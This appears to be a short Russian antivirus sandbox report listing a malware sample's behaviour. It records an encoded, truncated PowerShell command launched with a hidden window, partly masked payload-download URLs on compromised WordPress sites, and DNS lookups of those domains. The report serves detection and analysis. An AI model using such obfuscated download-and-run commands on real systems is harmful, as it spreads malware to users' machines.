Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAVgBHAFgAZABuAG8APQAnAEcARwBGAEkAUwBxAGIAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAFUAUgBpAFQAYAB5AFAAcgBPAFQAbwBjAG8AbAAiACAAPQAgAC...
- 'ly##inc.com':80
- http://rh###paving.com/wp-content/431e_ks_ohbu7uf/
- http://se##icst.ru/wp-content/haasy_0ail8_llg/
- DNS ASK rh###paving.com
- DNS ASK sp#.#pm.gov.my
- DNS ASK se##icst.ru
- DNS ASK te#####eshorganics.com
- DNS ASK ly##inc.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAVgBHAFgAZABuAG8APQAnAEcARwBGAEkAUwBxAGIAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAFUAUgBpAFQAYAB5AFAAcgBPAFQAbwBjAG8AbAAiACAAPQAgAC...' (со скрытым окном)